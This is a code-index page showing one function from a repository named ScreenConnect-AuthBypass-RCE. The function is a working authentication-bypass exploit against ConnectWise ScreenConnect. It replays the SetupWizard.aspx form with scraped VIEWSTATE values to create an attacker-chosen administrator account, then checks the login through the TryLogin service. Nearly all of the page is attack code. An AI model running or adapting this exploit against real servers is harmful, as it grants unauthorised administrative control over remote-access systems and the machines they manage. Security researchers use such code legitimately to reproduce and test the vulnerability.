MCPcopy Index your code
hub / github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE / AddUser

Function AddUser

ScreenConnect-AuthBypass-RCE.py:159–189  ·  view source on GitHub ↗
(url, username, password, domain)

Source from the content-addressed store, hash-verified

157 print("[-] Error in func <DeleteExtension>, error message: " + str(err))
158
159def AddUser(url, username, password, domain):
160 if CheckVersion(url):
161 try:
162 initial_request = requests.get(url=url + "/SetupWizard.aspx/", verify=False)
163 viewstate_1 = re.search(r'value="([^"]+)"', initial_request.text).group(1)
164 viewgen_1 = re.search(r'VIEWSTATEGENERATOR" value="([^"]+)"', initial_request.text).group(1)
165 next_data = {"__EVENTTARGET": '', "__EVENTARGUMENT": '', "__VIEWSTATE": viewstate_1,
166 "__VIEWSTATEGENERATOR": viewgen_1,
167 "ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton": "Next"}
168 next_request = requests.post(url=url + "/SetupWizard.aspx/", headers=exploit_header, data=next_data, verify=False)
169 exploit_viewstate = re.search(r'value="([^"]+)"', next_request.text).group(1)
170 exploit_viewgen = re.search(r'VIEWSTATEGENERATOR" value="([^"]+)"', next_request.text).group(1)
171 exploit_data = {"__LASTFOCUS": '', "__EVENTTARGET": '', "__EVENTARGUMENT": '', "__VIEWSTATE": exploit_viewstate,
172 "__VIEWSTATEGENERATOR": exploit_viewgen, "ctl00$Main$wizard$userNameBox": username,
173 "ctl00$Main$wizard$emailBox": username + f"@{domain}",
174 "ctl00$Main$wizard$passwordBox": password, "ctl00$Main$wizard$verifyPasswordBox": password,
175 "ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton": "Next"}
176 requests.post(url=url + "/SetupWizard.aspx/", headers=exploit_header, data=exploit_data, verify=False)
177 check_url = url + "/Services/AuthenticationService.ashx/TryLogin"
178 check_data = f"""["{username}","{password}",null,null,null]"""
179 check_header = {
180 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36",
181 "Content-Type": "application/json"
182 }
183 check_response = requests.post(url=check_url, data=check_data, headers=check_header, verify=False)
184 if check_response.ok and "1" in check_response.text:
185 print(f"[+] {url} Successfully added user. username: {GREEN}{username}{RESET} and password: {GREEN}{password}{RESET}")
186 else:
187 print(f"[-] Failed to add user, {url} does not have this vulnerability, please check the network and try again or try to exploit manually")
188 except Exception as err:
189 print("[-] Error in func <AddUser>, error message: " + str(err))
190
191def CheckVersion(url):
192 try:

Callers 1

Calls 1

CheckVersionFunction · 0.85

Tested by

no test coverage detected